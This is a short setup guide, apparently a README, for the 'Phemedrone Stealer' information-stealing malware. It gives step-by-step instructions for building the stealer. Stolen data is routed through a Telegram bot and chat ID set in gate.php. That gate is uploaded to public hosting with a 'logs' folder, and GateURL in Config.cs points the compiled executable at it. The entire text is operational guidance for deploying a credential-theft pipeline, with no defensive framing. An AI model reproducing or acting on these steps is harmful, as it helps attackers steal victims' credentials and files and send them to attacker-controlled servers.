How to Setup?
Create a new bot at
@BotFather and copy Bot Token. Go to
@chat_id_echo_bot and type bot and start it. Copy your Chat ID. Open gate.php (From Phemedrone Gate Floder) using any text editor and replace YOUR TELEGRAM BOT TOKEN with the bot token you copied before and replace YOUR CHAT ID with your copied Chat ID. Upload gate.php on any hosting service to a public html folder. Create "logs" (without quotes) folder in the same location as gate.php. Open the project in a C# IDE (for e.g. Visual Studio). Open Config.cs and change GateURL variable to your Gate URL (for e.g.
http://yourhosting.com/gate.php). Config.cs also contains other variables that you may modify for better experience. Change build type to Release and then build the project. Output executable will be located at ./Phemedrone-Stealer/bin/Release folder.